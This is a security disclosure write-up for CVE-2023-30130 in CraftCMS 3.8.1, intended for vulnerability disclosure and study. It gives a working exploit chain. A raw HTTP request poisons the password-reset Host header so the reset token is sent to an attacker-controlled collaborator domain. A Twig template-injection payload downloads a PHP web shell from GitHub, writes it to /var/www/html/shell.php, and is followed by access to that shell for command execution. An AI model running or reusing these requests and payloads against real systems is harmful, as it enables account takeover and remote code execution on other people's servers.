# Server-Site Template Injection on CraftCMS 3.8.1

**Exploit Author:** Tin Pham (aka TF1T) and Trong Pham (aka Dtro) of VietSunshine Cyber Security Services

**Vendor of Product:** CraftCMS

**Affected Product Code Base:** 3.8.1

**CVE:** CVE-2023-30130

**Summary**:

An issue found in CraftCMS v.3.8.1 allows a remote attacker to execute arbitrary code via a crafted script to the Section parameter.

1. Go to Settings -> Section -> Edit entry types (Or create new section with Single's Section Type, then edit entry types) 
2. Injection malicious code to Title Format, uses `file_get_contents` and `file_put_contents` to upload files and get RCE.

### **The story:**

CraftCMS is open source and a program of huntr.dev.

#### Bypass authentication

The Reset password is vulnerable to Head host poisoning, when an attacker changes Host header to attacker's domain/IP, the host of reset link that sends to victim email will be replaced with attacker's IP. If victim clicks the link, reset token will send to attacker server, so an attacker can assign new password and takeover target account.

RAW Request:

```
POST /craft_cms/web/index.php?p=admin/actions/users/send-password-reset-email HTTP/1.1
Host: 0ghrrr0ekjckhxqmm60dk5jy8peg2aqz.oastify.com
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: Y6gyOuBAHhUN0BJn5W6WctXfds2d00I4SfLo0EtZ9zxiu-TCgmjyCBrQfA6UBHAgQJtKHrJY4h6diACDrZsITDGejrwfML1oKYOvkrsGuEo=
X-Requested-With: XMLHttpRequest
Content-Length: 16
Connection: close
Cookie: CraftSessionId=v5vpt4j31f7kr23p4ocgfau5n7; CRAFT_CSRF_TOKEN=2a0c3da686a677780c906774b0e732c1c2986d722ad895d238ae0d5e45626b26a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22yxN4tDn5MKXyW6tlHWvN0HJtxlflTiJTK8KP9nJB%22%3B%7D

loginName=admin
```

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2FMUn9f2afiEIu33WggHTR%2Fhead-host-poisoning.png?alt=media&#x26;token=0b55d8a4-55f0-49b8-82ba-8d0775741a98" alt=""><figcaption></figcaption></figure>

#### RCE

At admin site, we see multiple location allowing user that enter Template code, one of them is at Create a new section with Single's Section Type.

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2FWJ0PiFgR6yCPE1KE7Pca%2Fcreate_single_section.png?alt=media&#x26;token=196d2bcb-2e79-437e-8e50-0d1ee3bbde27" alt=""><figcaption></figcaption></figure>

&#x20;We can inject Twig template to Title Format when editing Entry Types of this section.

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2FmBtJtupxPhQO5wdumg5I%2Fedit_entry_type.png?alt=media&#x26;token=1fc2f80d-bbfe-455b-bb3b-b7a4dbb1e923" alt=""><figcaption><p>default Title Format</p></figcaption></figure>

We can use 2 function `file_get_contents`  and `file_put_contents` to RCE as below:

Payload:

```
{% set source=['https://raw.githubusercontent.com/trungtin1998/Scripts/master/PwnFunction.php']|map('file_get_contents')|join  %} {{{(source):"/var/www/html/shell.php"}|map("file_put_contents")|join()}}
```

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2Fm2impa6yIaPzPpvkwzG7%2Fedit_entry_type_inject_ssti.png?alt=media&#x26;token=8d3e773c-7671-47bd-a82c-8cd38b3a1c96" alt=""><figcaption></figcaption></figure>

Access /shell.php to execute command:

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2F5jfu9x7jkUvvO1WYjRvM%2Fwrite_shell.png?alt=media&#x26;token=9fa9edcc-5a4f-45ce-837f-59f811b5b615" alt=""><figcaption></figcaption></figure>

**Impact:** Code execution&#x20;